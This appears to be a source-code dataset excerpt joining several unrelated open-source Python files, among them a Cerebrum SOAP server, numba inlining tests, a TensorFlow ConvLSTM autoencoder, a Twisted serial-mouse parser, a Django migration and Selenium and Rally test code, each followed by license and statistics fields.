name = models.CharField(max_length=200, verbose_name=_('Name'))
deleted = models.BooleanField(default=False, verbose_name=_('Marked for deletion'))
class Meta:
verbose_name = _('Module alias')
verbose_name_plural = _('Module aliases')
unique_together = ('module', 'name')
class ModuleParentRequirement(models.Model):
module = models.ForeignKey(to='Module', verbose_name=_('Module'))
uuid = models.UUIDField(verbose_name=_('Identifier'))
deleted = models.BooleanField(default=False, verbose_name=_('Marked for deletion'))
class Meta:
verbose_name = _('Module parent requirement')
verbose_name_plural = _('Module parent requirements')
unique_together = ('module', 'uuid')
class ModuleChildRequirement(models.Model):
module = models.ForeignKey(to='Module', verbose_name=_('Module'))
uuid = models.UUIDField(verbose_name=_('Identifier'))
deleted = models.BooleanField(default=False, verbose_name=_('Marked for deletion'))
class Meta:
verbose_name = _('Module child requirement')
verbose_name_plural = _('Module child requirements')
unique_together = ('module', 'uuid')
class ModuleImplementedRequirement(models.Model):
module = models.ForeignKey(to='Module', verbose_name=_('Module'))
uuid = models.UUIDField(verbose_name=_('Identifier'))
deleted = models.BooleanField(default=False, verbose_name=_('Marked for deletion'))
class Meta:
verbose_name = _('Module implemented requirement')
verbose_name_plural = _('Module implemented requirements')
unique_together = ('module', 'uuid')
| mit | -7,060,074,287,676,643,000 | 40.053763 | 99 | 0.660424 | false | 4.012612 | false | false | false |
unioslo/cerebrum | servers/cis/SoapPostmasterServer.py | 1 | 7241 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2011, 2012 University of Oslo, Norway
#
# This file is part of Cerebrum.
#
# Cerebrum is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cerebrum is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cerebrum; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""A SOAP server for giving Postmaster's what they want of information from
Cerebrum.
Note that the logger is twisted's own logger and not Cerebrum's. Since twisted
works in parallell the logger should not be blocked. Due to this, the format of
the logs is not equal to the rest of Cerebrum. This might be something to work
on later.
"""
from __future__ import unicode_literals
import sys
import getopt
from twisted.python import log
from rpclib.model.primitive import Unicode
from rpclib.model.complex import Array
from rpclib.decorator import rpc
from cisconf import postmaster as cisconf
from Cerebrum.Utils import dyn_import
from Cerebrum import Errors
from Cerebrum.modules.cis import SoapListener
class PostmasterServer(SoapListener.BasicSoapServer):
"""The SOAP commands available for the clients.
TODO: is the following correct anymore? Note that an instance of this class
is created for each incoming call.
"""
# Headers: no need for headers for e.g. session IDs in this web service.
# The class where the Cerebrum-specific functionality is done. This is
# instantiated per call, to avoid thread conflicts.
cere_class = None
# The hock for the site object
site = None
@rpc(Array(Unicode), Array(Unicode), Array(Unicode),
_returns=Array(Unicode))
def get_addresses_by_affiliation(ctx, status=None, skos=None, source=None):
"""Get primary e-mail addresses for persons that match given
criteria."""
if not source and not status:
raise Errors.CerebrumRPCException('Input needed')
return ctx.udc['postmaster'].get_addresses_by_affiliation(
status=status, skos=skos, source=source)
# Events for the project:
def event_method_call(ctx):
"""Event for incoming calls."""
ctx.udc['postmaster'] = ctx.service_class.cere_class()
PostmasterServer.event_manager.add_listener('method_call', event_method_call)
def event_exit(ctx):
"""Event for cleaning after a call, i.e. close up db connections. Since
twisted runs all calls in a pool of threads, we can not trust __del__.
"""
# TODO: is this necessary any more, as we now are storing it in the method
# context? Are these deleted after each call? Check it out!
if 'postmaster' in ctx.udc:
ctx.udc['postmaster'].close()
PostmasterServer.event_manager.add_listener('method_return_object', event_exit)
PostmasterServer.event_manager.add_listener('method_exception_object',
event_exit)
def usage(exitcode=0):
print """Usage: %s --port PORT --instance INSTANCE --logfile FILE
Fire up the Postmaster's webservice.
--port What port to run the server. Default: cisconf.PORT.
--interface What interface the server should listen to (default: 0.0.0.0)
Default: cisconf.INTERFACE.
--logfile Where to log. Default: cisconf.LOG_FILE.
--fingerprints A comma separated list of certificate fingerprints. If this
is set, client certificates that doesn't generate fingerprints
which are in this list gets blocked from the service.
Default: cisconf.FINGERPRINTS.
--instance The Cerebrum instance which should be used. E.g:
Cerebrum.modules.no.uio.PostmasterCommands/Commands
Default: cisconf.CEREBRUM_CLASS.
--unencrypted Don't use https
--help Show this and quit
"""
sys.exit(exitcode)
if __name__ == '__main__':
try:
opts, args = getopt.getopt(sys.argv[1:], 'h',
['port=', 'unencrypted', 'logfile=',
'help', 'fingerprints=', 'instance=',
'interface='])
except getopt.GetoptError as e:
print e
usage(1)
use_encryption = True
port = getattr(cisconf, 'PORT', 0)
logfilename = getattr(cisconf, 'LOG_FILE', None)
instance = getattr(cisconf, 'CEREBRUM_CLASS', None)
interface = getattr(cisconf, 'INTERFACE', None)
log_prefix = getattr(cisconf, 'LOG_PREFIX', None)
log_formatters = getattr(cisconf, 'LOG_FORMATTERS', None)
for opt, val in opts:
if opt in ('--logfile',):
logfilename = val
elif opt in ('--port',):
port = int(val)
elif opt in ('--unencrypted',):
use_encryption = False
elif opt in ('--instance',):
instance = val
elif opt in ('--interface',):
interface = val
elif opt in ('-h', '--help'):
usage()
else:
print "Unknown argument: %s" % opt
usage(1)
if not port or not logfilename or not instance:
print "Missing arguments or cisconf variables"
usage(1)
# Get the cerebrum class and give it to the server
module, classname = instance.split('/', 1)
mod = dyn_import(module)
cls = getattr(mod, classname)
PostmasterServer.cere_class = cls
log.msg("DEBUG: Cerebrum class used: %s" % instance)
private_key_file = None
certificate_file = None
client_ca = None
fingerprints = None
if interface:
SoapListener.TwistedSoapStarter.interface = interface
if use_encryption:
private_key_file = cisconf.SERVER_PRIVATE_KEY_FILE
certificate_file = cisconf.SERVER_CERTIFICATE_FILE
client_ca = cisconf.CERTIFICATE_AUTHORITIES
fingerprints = getattr(cisconf, 'FINGERPRINTS', None)
server = SoapListener.TLSTwistedSoapStarter(
port=int(port),
applications=PostmasterServer,
private_key_file=private_key_file,
certificate_file=certificate_file,
client_ca=client_ca,
client_fingerprints=fingerprints,
logfile=logfilename,
log_prefix=log_prefix,
log_formatters=log_formatters)
else:
server = SoapListener.TwistedSoapStarter(
port=int(port),
applications=PostmasterServer,
logfile=logfilename,
log_prefix=log_prefix,
log_formatters=log_formatters)
# to make it global and reachable (wrong, I know)
PostmasterServer.site = server.site
# If sessions' behaviour should be changed (e.g. timeout):
# server.site.sessionFactory = BasicSession
# Fire up the server:
server.run()
| gpl-2.0 | 7,271,564,093,782,399,000 | 32.836449 | 79 | 0.65502 | false | 3.92892 | false | false | false |
jriehl/numba | numba/tests/test_inlining.py | 1 | 8956 | from __future__ import print_function, absolute_import
import re
import numpy as np
from .support import TestCase, override_config, captured_stdout
import numba
from numba import unittest_support as unittest
from numba import jit, njit, types, ir, compiler
from numba.ir_utils import guard, find_callname, find_const, get_definition
from numba.targets.registry import CPUDispatcher
from numba.inline_closurecall import inline_closure_call
from .test_parfors import skip_unsupported
@jit((types.int32,), nopython=True)
def inner(a):
return a + 1
@jit((types.int32,), nopython=True)
def more(a):
return inner(inner(a))
def outer_simple(a):
return inner(a) * 2
def outer_multiple(a):
return inner(a) * more(a)
@njit
def __dummy__():
return
class InlineTestPipeline(numba.compiler.BasePipeline):
"""compiler pipeline for testing inlining after optimization
"""
def define_pipelines(self, pm):
name = 'inline_test'
pm.create_pipeline(name)
self.add_preprocessing_stage(pm)
self.add_with_handling_stage(pm)
self.add_pre_typing_stage(pm)
self.add_typing_stage(pm)
pm.add_stage(self.stage_pre_parfor_pass, "Preprocessing for parfors")
if not self.flags.no_rewrites:
pm.add_stage(self.stage_nopython_rewrites, "nopython rewrites")
if self.flags.auto_parallel.enabled:
pm.add_stage(self.stage_parfor_pass, "convert to parfors")
pm.add_stage(self.stage_inline_test_pass, "inline test")
pm.add_stage(self.stage_ir_legalization,
"ensure IR is legal prior to lowering")
self.add_lowering_stage(pm)
self.add_cleanup_stage(pm)
pm.add_stage(self.stage_preserve_final_ir, "preserve IR")
def stage_preserve_final_ir(self):
self.metadata['final_func_ir'] = self.func_ir.copy()
def stage_inline_test_pass(self):
# assuming the function has one block with one call inside
assert len(self.func_ir.blocks) == 1
block = list(self.func_ir.blocks.values())[0]
for i, stmt in enumerate(block.body):
if guard(find_callname,self.func_ir, stmt.value) is not None:
inline_closure_call(self.func_ir, {}, block, i, lambda: None,
self.typingctx, (), self.typemap, self.calltypes)
break
class TestInlining(TestCase):
"""
Check that jitted inner functions are inlined into outer functions,
in nopython mode.
Note that not all inner functions are guaranteed to be inlined.
We just trust LLVM's inlining heuristics.
"""
def make_pattern(self, fullname):
"""
        Make a regexp that matches the mangled form of *fullname*
"""
parts = fullname.split('.')
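        # e.g. 'pkg.func' gives r'_ZN?\d+pkg\d+func', which matches a mangled
        # name such as '_ZN3pkg4func...' in the assembly dump (illustrative).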
return r'_ZN?' + r''.join([r'\d+{}'.format(p) for p in parts])
def assert_has_pattern(self, fullname, text):
pat = self.make_pattern(fullname)
self.assertIsNotNone(re.search(pat, text),
msg='expected {}'.format(pat))
def assert_not_has_pattern(self, fullname, text):
pat = self.make_pattern(fullname)
self.assertIsNone(re.search(pat, text),
msg='unexpected {}'.format(pat))
def test_inner_function(self):
with override_config('DUMP_ASSEMBLY', True):
with captured_stdout() as out:
cfunc = jit((types.int32,), nopython=True)(outer_simple)
self.assertPreciseEqual(cfunc(1), 4)
# Check the inner function was elided from the output (which also
# guarantees it was inlined into the outer function).
asm = out.getvalue()
prefix = __name__
self.assert_has_pattern('%s.outer_simple' % prefix, asm)
self.assert_not_has_pattern('%s.inner' % prefix, asm)
def test_multiple_inner_functions(self):
# Same with multiple inner functions, and multiple calls to
# the same inner function (inner()). This checks that linking in
# the same library/module twice doesn't produce linker errors.
with override_config('DUMP_ASSEMBLY', True):
with captured_stdout() as out:
cfunc = jit((types.int32,), nopython=True)(outer_multiple)
self.assertPreciseEqual(cfunc(1), 6)
asm = out.getvalue()
prefix = __name__
self.assert_has_pattern('%s.outer_multiple' % prefix, asm)
self.assert_not_has_pattern('%s.more' % prefix, asm)
self.assert_not_has_pattern('%s.inner' % prefix, asm)
@skip_unsupported
def test_inline_call_after_parfor(self):
# replace the call to make sure inlining doesn't cause label conflict
# with parfor body
def test_impl(A):
__dummy__()
return A.sum()
j_func = njit(parallel=True, pipeline_class=InlineTestPipeline)(
test_impl)
A = np.arange(10)
self.assertEqual(test_impl(A), j_func(A))
@skip_unsupported
def test_inline_update_target_def(self):
def test_impl(a):
if a == 1:
b = 2
else:
b = 3
return b
func_ir = compiler.run_frontend(test_impl)
blocks = list(func_ir.blocks.values())
for block in blocks:
for i, stmt in enumerate(block.body):
# match b = 2 and replace with lambda: 2
if (isinstance(stmt, ir.Assign) and isinstance(stmt.value, ir.Var)
and guard(find_const, func_ir, stmt.value) == 2):
# replace expr with a dummy call
func_ir._definitions[stmt.target.name].remove(stmt.value)
stmt.value = ir.Expr.call(ir.Var(block.scope, "myvar", loc=stmt.loc), (), (), stmt.loc)
func_ir._definitions[stmt.target.name].append(stmt.value)
#func = g.py_func#
inline_closure_call(func_ir, {}, block, i, lambda: 2)
break
self.assertEqual(len(func_ir._definitions['b']), 2)
@skip_unsupported
def test_inline_var_dict_ret(self):
# make sure inline_closure_call returns the variable replacement dict
# and it contains the original variable name used in locals
@numba.njit(locals={'b': numba.float64})
def g(a):
b = a + 1
return b
def test_impl():
return g(1)
func_ir = compiler.run_frontend(test_impl)
blocks = list(func_ir.blocks.values())
for block in blocks:
for i, stmt in enumerate(block.body):
if (isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op == 'call'):
func_def = guard(get_definition, func_ir, stmt.value.func)
if (isinstance(func_def, (ir.Global, ir.FreeVar))
and isinstance(func_def.value, CPUDispatcher)):
py_func = func_def.value.py_func
_, var_map = inline_closure_call(
func_ir, py_func.__globals__, block, i, py_func)
break
self.assertTrue('b' in var_map)
@skip_unsupported
def test_inline_call_branch_pruning(self):
# branch pruning pass should run properly in inlining to enable
# functions with type checks
@njit
def foo(A=None):
if A is None:
return 2
else:
return A
def test_impl(A=None):
return foo(A)
class InlineTestPipelinePrune(InlineTestPipeline):
def stage_inline_test_pass(self):
# assuming the function has one block with one call inside
assert len(self.func_ir.blocks) == 1
block = list(self.func_ir.blocks.values())[0]
for i, stmt in enumerate(block.body):
if (guard(find_callname, self.func_ir, stmt.value)
is not None):
inline_closure_call(self.func_ir, {}, block, i,
foo.py_func, self.typingctx,
(self.typemap[stmt.value.args[0].name],),
self.typemap, self.calltypes)
break
# make sure inline_closure_call runs in full pipeline
j_func = njit(pipeline_class=InlineTestPipelinePrune)(test_impl)
A = 3
self.assertEqual(test_impl(A), j_func(A))
self.assertEqual(test_impl(), j_func())
# make sure IR doesn't have branches
fir = j_func.overloads[(types.Omitted(None),)].metadata['final_func_ir']
fir.blocks = numba.ir_utils.simplify_CFG(fir.blocks)
self.assertEqual(len(fir.blocks), 1)
if __name__ == '__main__':
unittest.main()
| bsd-2-clause | 2,180,229,305,516,285,200 | 38.280702 | 107 | 0.579276 | false | 3.870354 | true | false | false |
polltooh/CNN_LSTM | autoencoder_clstm.py | 1 | 5975 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange
import tensorflow as tf
import utility_function as uf
# import my_seq2seq as mseq
import os
import data_queue
import nt
import time
import con_lstm as clstm
RESTORE = False
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_integer('num_threads', 2, '''the number of threads for enqueue''')
tf.app.flags.DEFINE_string('train_log_dir','auto_logs',
'''directory wherer to write event logs''')
tf.app.flags.DEFINE_integer('max_training_iter', 100000,
'''the max number of training iteration''')
tf.app.flags.DEFINE_float('init_learning_rate',0.01,
'''initial learning rate''')
tf.app.flags.DEFINE_string('model_dir', 'auto_model_logs',
'''directory where to save the model''')
# INPUT_DIM = 64 * 64
INPUT_H = 64
INPUT_W = 64
INPUT_C = 1
LABEL_C = 1
CELL_C = 4
KSIZE = 5
# LABEL_DIM = INPUT_DIM
# CELL_DIM = 1024
# CELL_LAYER = 1
BATCH_SIZE = 5
# UNROLLING_NUM = 10
UNROLLING_NUM = 10
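# Composite encoder-decoder setup: the ConvLSTM encoder reads UNROLLING_NUM
# frames, then two decoders share its final state -- decoder1 is trained to
# reconstruct the input sequence in reverse order and decoder2 to predict the
# following UNROLLING_NUM frames (see how decodes1_ph/decodes2_ph are fed in
# the training loop below).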
def train():
input_data_queue = data_queue.DATA_QUEUE()
# image_name = tf.constant("lily.jpg", tf.string)
# image = uf.read_image(image_name, INPUT_H, INPUT_W)
# image_list = list()
# for _ in range(BATCH_SIZE):
# image_e = tf.expand_dims(image, 0)
# image_list.append(image_e)
# batch_image = tf.concat(0, image_list)
# batch_image = batching(image, FLAGS.batch_size)
clstm_cell = clstm.con_lstm_cell(BATCH_SIZE, INPUT_H, INPUT_W, INPUT_C, KSIZE, CELL_C)
# single_cell = tf.nn.rnn_cell.BasicLSTMCell(CELL_DIM)
# multi_cell = tf.nn.rnn_cell.MultiRNNCell([single_cell] * CELL_LAYER)
inputs_ph = list()
decodes1_ph = list()
decodes2_ph = list()
for _ in range(UNROLLING_NUM):
# inputs_ph.append(tf.placeholder(tf.float32,[BATCH_SIZE, INPUT_DIM], name = "input_ph"))
# decodes1_ph.append(tf.placeholder(tf.float32,[BATCH_SIZE, INPUT_DIM], name = "decodes1_ph"))
inputs_ph.append(tf.placeholder(tf.float32,[BATCH_SIZE, INPUT_H,
INPUT_W, INPUT_C], name = "input_ph"))
decodes1_ph.append(tf.placeholder(tf.float32,[BATCH_SIZE, INPUT_H,
INPUT_W, INPUT_C], name = "decodes1_ph"))
decodes2_ph.append(tf.placeholder(tf.float32,[BATCH_SIZE, INPUT_H,
INPUT_W, INPUT_C], name = "decodes2_ph"))
# cell_initial_state = multi_cell.zero_state(BATCH_SIZE, tf.float32)
cell_initial_state = clstm_cell.get_zero_state(BATCH_SIZE, INPUT_H, INPUT_W, CELL_C, tf.float32)
# decoder_inputs_dict = dict()
# decoder_inputs_dict['reconstruction'] = decodes1_ph
# decoder_inputs_dict['prediction'] = decodes2_ph
# num_decoder_symbols_dict = dict()
# num_decoder_symbols_dict["reconstruction"] = 0
# num_decoder_symbols_dict["prediction"] = 1
# feed_previous_ph = tf.placeholder(tf.bool)
# loop_function = lambda x,y:x
def loop_function(inp, i, weights, biases):
""" loop function for decode """
output = nt._conv2d(inp, weights, biases, [1,1,1,1])
return output
# with tf.device('/gpu:%d' % 1):
_, state = clstm.clstm_encode(clstm_cell, inputs_ph, cell_initial_state)
outputs1, _ = clstm.clstm_decode([inputs_ph[-1]], state, clstm_cell, UNROLLING_NUM,
loop_function, "decoder1")
outputs2, _ = clstm.clstm_decode([inputs_ph[-1]], state, clstm_cell, UNROLLING_NUM,
loop_function, "decoder2")
# print(outputs)
con_cat_out = tf.concat(0, outputs1 + outputs2)
infer = nt.inference3(con_cat_out, KSIZE, CELL_C, LABEL_C)
con_cat_decodes = tf.concat(0, decodes1_ph + decodes2_ph)
loss = nt.loss1(infer, con_cat_decodes)
saver = tf.train.Saver()
global_step = tf.Variable(0, name = 'global_step', trainable = False)
train_op = nt.training1(loss, FLAGS.init_learning_rate, global_step = global_step)
config_proto = uf.define_graph_config(0.2)
sess = tf.Session(config = config_proto)
init_op = tf.initialize_all_variables()
sess.run(init_op)
if RESTORE:
ckpt = tf.train.get_checkpoint_state(FLAGS.model_dir)
print(ckpt.all_model_checkpoint_paths[-1])
if ckpt and ckpt.all_model_checkpoint_paths[-1]:
saver.restore(sess, ckpt.all_model_checkpoint_paths[-1])
else:
print('no check point')
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord = coord, sess = sess)
for i in xrange(FLAGS.max_training_iter):
feed_data = dict()
for j in xrange(UNROLLING_NUM):
input_v = input_data_queue.get_next_batch_train(BATCH_SIZE, False, 4)
feed_data[inputs_ph[j]] = input_v[j]
feed_data[decodes1_ph[j]] = input_v[UNROLLING_NUM - j - 1]
# batch_image_v = sess.run(batch_image)
# feed_data[inputs_ph[j]] = batch_image_v
feed_data[decodes2_ph[j]] = input_v[UNROLLING_NUM + j]
# feed_data[feed_previous_ph] = True
_, loss_v = sess.run([train_op, loss], feed_dict = feed_data)
if i % 100 == 0:
# input_v = input_data_queue.get_next_batch_test(BATCH_SIZE, False, 4)
for j in range(UNROLLING_NUM):
feed_data[inputs_ph[j]] = input_v[j]
feed_data[decodes1_ph[j]] = input_v[UNROLLING_NUM - j - 1]
feed_data[decodes2_ph[j]] = input_v[UNROLLING_NUM + j]
# feed_data[inputs_ph[j]] = batch_image_v
# feed_data[decodes1_ph[j]] = batch_image_v
# feed_data[feed_previous_ph] = True
test_loss_v, infer_v = sess.run([loss, infer], feed_dict = feed_data)
# dis_image = np.concatenate((batch_image_v[0], infer_v[0]), axis = 0)
dis_image = np.concatenate((input_v[0,-1], infer_v[0,-1]), axis = 0)
uf.display_image(dis_image)
disp = "i:%d, train loss:%f, test loss:%f"%(i, loss_v, test_loss_v)
print(disp)
if i != 0 and i % 5000 == 0:
curr_time = time.strftime("%Y%m%d_%H%M")
model_name = FLAGS.model_dir + '/' + curr_time + '_iter_' + str(i) + '_model.ckpt'
saver.save(sess,model_name)
def main(argv = None):
if not os.path.exists(FLAGS.model_dir):
os.makedirs(FLAGS.model_dir)
if not os.path.exists(FLAGS.train_log_dir):
os.makedirs(FLAGS.train_log_dir)
train()
if __name__ == '__main__':
tf.app.run()
| mit | 5,912,634,475,341,728,000 | 34.778443 | 97 | 0.669623 | false | 2.63448 | false | false | false |
glwu/python-for-android | python-modules/twisted/twisted/protocols/mice/mouseman.py | 81 | 2882 | # Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
#
"""Logictech MouseMan serial protocol.
http://www.softnco.demon.co.uk/SerialMouse.txt
"""
from twisted.internet import protocol
class MouseMan(protocol.Protocol):
"""
Parser for Logitech MouseMan serial mouse protocol (compatible
with Microsoft Serial Mouse).
"""
state = 'initial'
leftbutton=None
rightbutton=None
middlebutton=None
leftold=None
rightold=None
middleold=None
horiz=None
vert=None
horizold=None
vertold=None
def down_left(self):
pass
def up_left(self):
pass
def down_middle(self):
pass
def up_middle(self):
pass
def down_right(self):
pass
def up_right(self):
pass
def move(self, x, y):
pass
horiz=None
vert=None
def state_initial(self, byte):
if byte & 1<<6:
self.word1=byte
self.leftbutton = byte & 1<<5
self.rightbutton = byte & 1<<4
return 'horiz'
else:
return 'initial'
def state_horiz(self, byte):
if byte & 1<<6:
return self.state_initial(byte)
else:
x=(self.word1 & 0x03)<<6 | (byte & 0x3f)
if x>=128:
x=-256+x
self.horiz = x
return 'vert'
def state_vert(self, byte):
if byte & 1<<6:
# short packet
return self.state_initial(byte)
else:
x = (self.word1 & 0x0c)<<4 | (byte & 0x3f)
if x>=128:
x=-256+x
self.vert = x
self.snapshot()
return 'maybemiddle'
def state_maybemiddle(self, byte):
if byte & 1<<6:
self.snapshot()
return self.state_initial(byte)
else:
self.middlebutton=byte & 1<<5
self.snapshot()
return 'initial'
def snapshot(self):
if self.leftbutton and not self.leftold:
self.down_left()
self.leftold=1
if not self.leftbutton and self.leftold:
self.up_left()
self.leftold=0
if self.middlebutton and not self.middleold:
self.down_middle()
self.middleold=1
if not self.middlebutton and self.middleold:
self.up_middle()
self.middleold=0
if self.rightbutton and not self.rightold:
self.down_right()
self.rightold=1
if not self.rightbutton and self.rightold:
self.up_right()
self.rightold=0
if self.horiz or self.vert:
self.move(self.horiz, self.vert)
def dataReceived(self, data):
for c in data:
byte = ord(c)
self.state = getattr(self, 'state_'+self.state)(byte)
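# A minimal usage sketch (illustrative only; assumes a serial mouse on
# /dev/ttyS0 and twisted's SerialPort transport):
#
#     from twisted.internet import reactor
#     from twisted.internet.serialport import SerialPort
#
#     class PrintingMouse(MouseMan):
#         def down_left(self):
#             print 'left button down'
#         def move(self, x, y):
#             print 'moved by', x, y
#
#     SerialPort(PrintingMouse(), '/dev/ttyS0', reactor, baudrate=1200)
#     reactor.run()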
| apache-2.0 | 1,402,906,385,291,070,500 | 21.692913 | 66 | 0.535392 | false | 3.792105 | false | false | false |
fxdgear/beersocial | socialbeer/core/migrations/0002_auto__add_field_challenge_description.py | 1 | 4396 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Challenge.description'
db.add_column('core_challenge', 'description', self.gf('django.db.models.fields.TextField')(null=True, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Challenge.description'
db.delete_column('core_challenge', 'description')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.challenge': {
'Meta': {'object_name': 'Challenge'},
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {})
}
}
complete_apps = ['core']
| mit | -2,602,980,566,242,846,700 | 61.8 | 182 | 0.557097 | false | 3.776632 | false | false | false |
iamgroot42/braindump | tests/test_selenium.py | 1 | 2598 | import re
import threading
import time
import unittest
from selenium import webdriver
from app import create_app, db
from app.models import User
class SeleniumTestCase(unittest.TestCase):
client = None
@classmethod
def setUpClass(cls):
# start Firefox
try:
cls.client = webdriver.Firefox()
except:
pass
# skip these tests if the browser could not be started
if cls.client:
# create the application
cls.app = create_app('testing')
cls.app_context = cls.app.app_context()
cls.app_context.push()
# suppress logging to keep unittest output clean
import logging
logger = logging.getLogger('werkzeug')
logger.setLevel("ERROR")
# create the database and populate with some fake data
db.create_all()
User.generate_fake(10)
# add admin user
admin = User(
email='[email protected]',
username='test',
password='test',
confirmed=True)
db.session.add(admin)
db.session.commit()
# start the Flask server in a thread
threading.Thread(target=cls.app.run).start()
# give the server a second to ensure it is up
time.sleep(1)
@classmethod
def tearDownClass(cls):
if cls.client:
# stop the flask server and the browser
cls.client.get('http://localhost:5000/shutdown')
cls.client.close()
# destroy database
db.drop_all()
db.session.remove()
# remove application context
cls.app_context.pop()
def setUp(self):
if not self.client:
self.skipTest('Web browser not available')
def tearDown(self):
pass
def test_home_page(self):
# navigate to home page
self.client.get('http://localhost:5000')
self.assertTrue(re.search(
'BrainDump',
self.client.page_source))
# navigate to login page
self.client.find_element_by_link_text('Log In').click()
self.assertTrue('<h1>Login</h1>' in self.client.page_source)
# login
self.client.find_element_by_name('email').\
send_keys('[email protected]')
self.client.find_element_by_name(
'password').send_keys('test')
        self.client.find_element_by_name('submit').click()
self.assertTrue('Log Out' in self.client.page_source)
| mit | -2,157,156,705,062,835,200 | 27.866667 | 68 | 0.565435 | false | 4.456261 | true | false | false |
yeming233/rally | rally/plugins/openstack/scenario.py | 1 | 5147 | # Copyright 2015: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import random
from oslo_config import cfg
from osprofiler import profiler
from rally import osclients
from rally.task import scenario
configure = functools.partial(scenario.configure, platform="openstack")
CONF = cfg.CONF
class OpenStackScenario(scenario.Scenario):
"""Base class for all OpenStack scenarios."""
def __init__(self, context=None, admin_clients=None, clients=None):
super(OpenStackScenario, self).__init__(context)
if context:
api_info = {}
if "api_versions" in context.get("config", {}):
api_versions = context["config"]["api_versions"]
for service in api_versions:
api_info[service] = {
"version": api_versions[service].get("version"),
"service_type": api_versions[service].get(
"service_type")}
if admin_clients is None and "admin" in context:
self._admin_clients = osclients.Clients(
context["admin"]["credential"], api_info)
if clients is None:
if "users" in context and "user" not in context:
self._choose_user(context)
if "user" in context:
self._clients = osclients.Clients(
context["user"]["credential"], api_info)
if admin_clients:
self._admin_clients = admin_clients
if clients:
self._clients = clients
self._init_profiler(context)
def _choose_user(self, context):
"""Choose one user from users context
We are choosing on each iteration one user
"""
if context["user_choice_method"] == "random":
user = random.choice(context["users"])
tenant = context["tenants"][user["tenant_id"]]
else:
# Second and last case - 'round_robin'.
tenants_amount = len(context["tenants"])
# NOTE(amaretskiy): iteration is subtracted by `1' because it
# starts from `1' but we count from `0'
iteration = context["iteration"] - 1
tenant_index = int(iteration % tenants_amount)
tenant_id = sorted(context["tenants"].keys())[tenant_index]
tenant = context["tenants"][tenant_id]
users = context["tenants"][tenant_id]["users"]
user_index = int((iteration / tenants_amount) % len(users))
user = users[user_index]
context["user"], context["tenant"] = user, tenant
def clients(self, client_type, version=None):
"""Returns a python openstack client of the requested type.
Only one non-admin user is used per every run of scenario.
:param client_type: Client type ("nova"/"glance" etc.)
